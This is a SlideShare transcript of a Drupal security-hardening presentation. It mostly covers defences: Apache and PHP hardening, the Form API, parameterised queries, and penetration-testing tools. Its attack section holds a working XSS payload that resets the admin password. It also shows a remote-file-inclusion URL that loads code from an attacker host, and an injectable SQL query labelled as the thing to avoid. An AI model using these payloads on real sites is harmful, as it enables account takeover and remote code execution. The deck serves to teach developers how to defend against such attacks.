SlideShare a Scribd company logo
1 of 30
Download to read offline
Drupal Security Hardening
Agenda


●   Anatomy of Vulnerabilities
●   Protecting against Vulnerabilities
Kite Systems is an Agile development house
 which means the client is actively involved
    all the way through the development
                   process.
  We build high quality, secure platforms
 using Java J2EE, Microsoft .NET, Ruby on
         Rails, PHP and Python.
Join Us
About myself, Gerald Villorente

●   Web Developer/themer at Kite Systems Inc.
●   Drupal developer since 2010
●   Drupal PH kids mentor
Is Drupal Secure?
State of being “SECURE”
    A site is secure if:
●   private data is kept private,
●   the site cannot be forced offline or into a
    degraded mode by a remote visitor
●   the site resources are used only for their
    intended purposes
●   the site content can be edited only by
    appropriate users.”
Drupal Security Hardening
Drupal Security Hardening
Week spot of web applications
    For Drupal developer who wants to deliver an
    applications, security do not ends with proper use
    of Drupal security API:
●   OS (MS, Unix, BSD, OS X)
●   Web Server (Apache, IIS, Nginx, ...)
●   Web Platform (php, .NET, ...)
●   Other Services (ftp, …)
●   Web applications - attacks against authentication &
    authorization, site structure, input validation, app logic
●   database - sql injection
●   availability - DoS attacks
Common Drupal attacks

●   XSS
●   CSRF
●   Injection
XSS
 jQuery.get(Drupal.settings.basePath + 'user/1/edit',
   function (data, status) {
     if (status == 'success') {
       // Extract the token and other required data
       var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/);
       var token = matches[1];
       // Post the minimum amount of fields. Other fields get their default values.
       var payload = {
         "form_id": 'user_profile_form',
         "form_token": token,
         "pass[pass1]": 'hacked',
         "pass[pass2]": 'hacked'
         };
         jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload);
       }
     }
   );
 }
Other Attacks
●   DDoS
●   Remote code execution
    - Exploiting register_globals in PHP

    require ($page . ".php");
    http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
Demo
Counter Measures
●   Proper use of Drupal API
●   Coding Standard (coder, code_sniffer)
    - Coder & Sniffer demo
●   Keep up with security patches and minor
    releases
●   Permission by role (hook_perm, user_access)
●   Firewall
●   SSL (Secure Socket Layer)
Counter Measures (cont.)
●   File permission
Apache Hardening
●   Disable unneeded modules
●   Implement ModSecurity, Request Filtering,
    Anti-Evasion Techniques, HTTP Filtering
    Rules, Full Audit Logging, HTTPS
    Intercepting, Chroot Functionality, Mask
    Web Server Identity
●   Document root restriction – allow Apache to
    only go to /path/to/public_html
Apache Hardening
●    Chrooting Apache


    $ mkdir -p /var/chroot/apache

    $ adduser --home /var/chroot/apache --shell /bin/false 
        --no-create-home --system --group juandelacruz
PHP Hardening (part 1)
●   turn off register_globals
●   open_basedir - restrict php file access to only
    certain directories
●   disable_functions
●   expose_php - remove php info from http headers
●   display_errors
●   safe_mode - php can use only files which it is an
    owner
●   allow_url_fopen
PHP Hardening (part 2)
●   Suhoshin
    - php engine protection with couple of
    patches
    - range of runtime protection, session
    protection, filtering features and logging
    - features
Drupal Hardening
●   Keep updated
●   Coding standard
●   Install only trusted module, check issue
    queue
●   Use captcha, login_security, single_login,
    password_policy, salt
●   user permission
●   input formats and filter
Drupal Hardening: Coding Standard
 Never write and/or execute sql commands manually, use Drupal DB layer
 use db_query() properly


 don't write
 db_query("SELECT * FROM {users} WHERE name = '$username'") ;


 write this
 db_query("SELECT * FROM {users} WHERE name = '%s'", $username);


 placeholders are: %s, %d, %f, %b, %%


 use db_rewrite_sql to respect node access restrictions
 $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
Drupal Hardening: Form API
●   never write forms that manually uses Drupal's Forms API
●   Forms API protects you from invalid form data
●   Forms API protects you against CSRF
●   don't trust js for input validation - its easy to disable it. If
    you want to use it always check user data on server side.
●   when using AJAX use drupal_get_token and
    drupal_check_token:
●   Calculate hash of defined string, user session and site
    specific secret code
Drupal Hardening: File Upload

●   file_validate_is_image - check if file is really
    an image
●   check_file - check if file is uploaded via
    HTTP POST
●   file_check_location - Check if a file is really
    located inside $directory
●   set disk quotes properly - you don't want to
    fill server hard disk
Drupal Hardening: Respect and define
new permissions
●   consider to use hook_perm in your module
●   wrap your code with user_access
     if (user_access('some permission')) { .... }

●   filter_access($format) – check if user has
    access to requested filter format
●   use menu access arguments
Drupal Hardening: Dont trust user input

    Filter user input, sanitize the output
●   Input Format
●   filter_xss() - Filters HTML to prevent XSS
●   check_plain() - Encodes special characters
    in a plain-text string for display as HTML
●   check_url() - filter dangerous protocol
●   check_markup - Run all the enabled filters
    on a piece of text
Drupal Hardening: Dont trust user input
Again, think like a hacker...
●   Use penetration testing tool
    - Metasploit framework
    - Nessus
    - Nikto
    - Backbox and Backtrack
●   Fix, audit, fix ...
Resources
●   http://drupal.org/security
●   http://drupal.org/writing-secure-code
●   http://crackingdrupal.com
●   http://www.owasp.org
●   http://ha.ckers.org
●   http://www.exploit-db.com
Drupal Security Hardening

More Related Content

What's hot

Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!Positive Hack Days
 
HTTP basics in relation to Applicaiton Security - OWASP
HTTP basics in relation to Applicaiton Security  - OWASPHTTP basics in relation to Applicaiton Security  - OWASP
HTTP basics in relation to Applicaiton Security - OWASPEoin Keary
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 

What's hot (8)

Php
PhpPhp
Php
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Php
PhpPhp
Php
 
Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!
 
HTTP basics in relation to Applicaiton Security - OWASP
HTTP basics in relation to Applicaiton Security  - OWASPHTTP basics in relation to Applicaiton Security  - OWASP
HTTP basics in relation to Applicaiton Security - OWASP
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirty
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser Security
 

Similar to Drupal Security Hardening

Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Drupal security
Drupal securityDrupal security
Drupal securityJozef Toth
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security rightGábor Hojtsy
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
Drupal and security - Advice for Site Builders and Coders
Drupal and security - Advice for Site Builders and CodersDrupal and security - Advice for Site Builders and Coders
Drupal and security - Advice for Site Builders and CodersArunkumar Kupppuswamy
 
Pyramid Deployment and Maintenance
Pyramid Deployment and MaintenancePyramid Deployment and Maintenance
Pyramid Deployment and MaintenanceJazkarta, Inc.
 
TangoWithDjango - ch8
TangoWithDjango - ch8TangoWithDjango - ch8
TangoWithDjango - ch8Asika Kuo
 
Course_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxCourse_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxssuser020436
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
 
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)cgmonroe
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonGábor Hojtsy
 
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICESONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICESDrupalCamp Kyiv
 
Keeping your Drupal site secure 2013
Keeping your Drupal site secure 2013Keeping your Drupal site secure 2013
Keeping your Drupal site secure 2013scorlosquet
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerabilityAnn Lam
 

Similar to Drupal Security Hardening (20)

Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Drupal and security - Advice for Site Builders and Coders
Drupal and security - Advice for Site Builders and CodersDrupal and security - Advice for Site Builders and Coders
Drupal and security - Advice for Site Builders and Coders
 
Pyramid Deployment and Maintenance
Pyramid Deployment and MaintenancePyramid Deployment and Maintenance
Pyramid Deployment and Maintenance
 
Rails Security
Rails SecurityRails Security
Rails Security
 
TangoWithDjango - ch8
TangoWithDjango - ch8TangoWithDjango - ch8
TangoWithDjango - ch8
 
Course_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptxCourse_Presentation cyber --------------.pptx
Course_Presentation cyber --------------.pptx
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICESONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
ONE MORE TIME ABOUT CODE STANDARDS AND BEST PRACTICES
 
Keeping your Drupal site secure 2013
Keeping your Drupal site secure 2013Keeping your Drupal site secure 2013
Keeping your Drupal site secure 2013
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
 

More from Gerald Villorente

Drupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksDrupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksGerald Villorente
 
BITS 2015: The Beauty of Drupal
BITS 2015: The Beauty of DrupalBITS 2015: The Beauty of Drupal
BITS 2015: The Beauty of DrupalGerald Villorente
 
Introduction to Drupal - Installation, Anatomy, Terminologies
Introduction to Drupal - Installation, Anatomy, TerminologiesIntroduction to Drupal - Installation, Anatomy, Terminologies
Introduction to Drupal - Installation, Anatomy, TerminologiesGerald Villorente
 
Consistent Development Environment with Vagrant and Chef
Consistent Development Environment with Vagrant and ChefConsistent Development Environment with Vagrant and Chef
Consistent Development Environment with Vagrant and ChefGerald Villorente
 
Drush Deployment Manager: Deployment Made Easy
Drush Deployment Manager: Deployment Made EasyDrush Deployment Manager: Deployment Made Easy
Drush Deployment Manager: Deployment Made EasyGerald Villorente
 
Consistent Development Environment using Vagrant and Chef
Consistent Development Environment using Vagrant and ChefConsistent Development Environment using Vagrant and Chef
Consistent Development Environment using Vagrant and ChefGerald Villorente
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentGerald Villorente
 
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and Vagrant
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and VagrantDrupal Pilipinas Apprentice: LAMP Administration, CSS, and Vagrant
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and VagrantGerald Villorente
 
Best Practices: Drupal Development
Best Practices: Drupal DevelopmentBest Practices: Drupal Development
Best Practices: Drupal DevelopmentGerald Villorente
 
Drupal Deployment and Essential Development Tools - 2nd Edition
Drupal Deployment and Essential Development Tools - 2nd EditionDrupal Deployment and Essential Development Tools - 2nd Edition
Drupal Deployment and Essential Development Tools - 2nd EditionGerald Villorente
 
Drupal Deployment and Essential Development Tools
Drupal Deployment and Essential Development ToolsDrupal Deployment and Essential Development Tools
Drupal Deployment and Essential Development ToolsGerald Villorente
 
Setting Up Cross-Browser Testing Environment (Debian-based System)
Setting Up Cross-Browser Testing Environment  (Debian-based System)Setting Up Cross-Browser Testing Environment  (Debian-based System)
Setting Up Cross-Browser Testing Environment (Debian-based System)Gerald Villorente
 

More from Gerald Villorente (20)

Of Docker and Drupal
Of Docker and DrupalOf Docker and Drupal
Of Docker and Drupal
 
Introduction to Kalabox
Introduction to KalaboxIntroduction to Kalabox
Introduction to Kalabox
 
Drupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and TricksDrupal Development : Tools, Tips, and Tricks
Drupal Development : Tools, Tips, and Tricks
 
Drupal 101 V-0.1
Drupal 101 V-0.1Drupal 101 V-0.1
Drupal 101 V-0.1
 
BITS 2015: The Beauty of Drupal
BITS 2015: The Beauty of DrupalBITS 2015: The Beauty of Drupal
BITS 2015: The Beauty of Drupal
 
Introduction to Drupal 7
Introduction to Drupal 7Introduction to Drupal 7
Introduction to Drupal 7
 
Introduction to Drupal - Installation, Anatomy, Terminologies
Introduction to Drupal - Installation, Anatomy, TerminologiesIntroduction to Drupal - Installation, Anatomy, Terminologies
Introduction to Drupal - Installation, Anatomy, Terminologies
 
Consistent Development Environment with Vagrant and Chef
Consistent Development Environment with Vagrant and ChefConsistent Development Environment with Vagrant and Chef
Consistent Development Environment with Vagrant and Chef
 
Drush Deployment Manager: Deployment Made Easy
Drush Deployment Manager: Deployment Made EasyDrush Deployment Manager: Deployment Made Easy
Drush Deployment Manager: Deployment Made Easy
 
Consistent Development Environment using Vagrant and Chef
Consistent Development Environment using Vagrant and ChefConsistent Development Environment using Vagrant and Chef
Consistent Development Environment using Vagrant and Chef
 
Why Drupal is Rockstar?
Why Drupal is Rockstar?Why Drupal is Rockstar?
Why Drupal is Rockstar?
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal Deployment
 
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and Vagrant
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and VagrantDrupal Pilipinas Apprentice: LAMP Administration, CSS, and Vagrant
Drupal Pilipinas Apprentice: LAMP Administration, CSS, and Vagrant
 
Drupal
DrupalDrupal
Drupal
 
Best Practices: Drupal Development
Best Practices: Drupal DevelopmentBest Practices: Drupal Development
Best Practices: Drupal Development
 
Drupal Deployment and Essential Development Tools - 2nd Edition
Drupal Deployment and Essential Development Tools - 2nd EditionDrupal Deployment and Essential Development Tools - 2nd Edition
Drupal Deployment and Essential Development Tools - 2nd Edition
 
Drupal Deployment and Essential Development Tools
Drupal Deployment and Essential Development ToolsDrupal Deployment and Essential Development Tools
Drupal Deployment and Essential Development Tools
 
Setting Up Cross-Browser Testing Environment (Debian-based System)
Setting Up Cross-Browser Testing Environment  (Debian-based System)Setting Up Cross-Browser Testing Environment  (Debian-based System)
Setting Up Cross-Browser Testing Environment (Debian-based System)
 
Git: Git'ing the Basic
Git: Git'ing the BasicGit: Git'ing the Basic
Git: Git'ing the Basic
 
Anatomy of Drupal
Anatomy of DrupalAnatomy of Drupal
Anatomy of Drupal
 

Recently uploaded

AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 

Recently uploaded (20)

AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 

Drupal Security Hardening

  • 2. Agenda ● Anatomy of Vulnerabilities ● Protecting against Vulnerabilities
  • 3. Kite Systems is an Agile development house which means the client is actively involved all the way through the development process. We build high quality, secure platforms using Java J2EE, Microsoft .NET, Ruby on Rails, PHP and Python.
  • 5. About myself, Gerald Villorente ● Web Developer/themer at Kite Systems Inc. ● Drupal developer since 2010 ● Drupal PH kids mentor
  • 7. State of being “SECURE” A site is secure if: ● private data is kept private, ● the site cannot be forced offline or into a degraded mode by a remote visitor ● the site resources are used only for their intended purposes ● the site content can be edited only by appropriate users.”
  • 10. Week spot of web applications For Drupal developer who wants to deliver an applications, security do not ends with proper use of Drupal security API: ● OS (MS, Unix, BSD, OS X) ● Web Server (Apache, IIS, Nginx, ...) ● Web Platform (php, .NET, ...) ● Other Services (ftp, …) ● Web applications - attacks against authentication & authorization, site structure, input validation, app logic ● database - sql injection ● availability - DoS attacks
  • 11. Common Drupal attacks ● XSS ● CSRF ● Injection
  • 12. XSS jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": 'user_profile_form', "form_token": token, "pass[pass1]": 'hacked', "pass[pass2]": 'hacked' }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); }
  • 13. Other Attacks ● DDoS ● Remote code execution - Exploiting register_globals in PHP require ($page . ".php"); http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
  • 14. Demo
  • 15. Counter Measures ● Proper use of Drupal API ● Coding Standard (coder, code_sniffer) - Coder & Sniffer demo ● Keep up with security patches and minor releases ● Permission by role (hook_perm, user_access) ● Firewall ● SSL (Secure Socket Layer)
  • 16. Counter Measures (cont.) ● File permission
  • 17. Apache Hardening ● Disable unneeded modules ● Implement ModSecurity, Request Filtering, Anti-Evasion Techniques, HTTP Filtering Rules, Full Audit Logging, HTTPS Intercepting, Chroot Functionality, Mask Web Server Identity ● Document root restriction – allow Apache to only go to /path/to/public_html
  • 18. Apache Hardening ● Chrooting Apache $ mkdir -p /var/chroot/apache $ adduser --home /var/chroot/apache --shell /bin/false --no-create-home --system --group juandelacruz
  • 19. PHP Hardening (part 1) ● turn off register_globals ● open_basedir - restrict php file access to only certain directories ● disable_functions ● expose_php - remove php info from http headers ● display_errors ● safe_mode - php can use only files which it is an owner ● allow_url_fopen
  • 20. PHP Hardening (part 2) ● Suhoshin - php engine protection with couple of patches - range of runtime protection, session protection, filtering features and logging - features
  • 21. Drupal Hardening ● Keep updated ● Coding standard ● Install only trusted module, check issue queue ● Use captcha, login_security, single_login, password_policy, salt ● user permission ● input formats and filter
  • 22. Drupal Hardening: Coding Standard Never write and/or execute sql commands manually, use Drupal DB layer use db_query() properly don't write db_query("SELECT * FROM {users} WHERE name = '$username'") ; write this db_query("SELECT * FROM {users} WHERE name = '%s'", $username); placeholders are: %s, %d, %f, %b, %% use db_rewrite_sql to respect node access restrictions $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
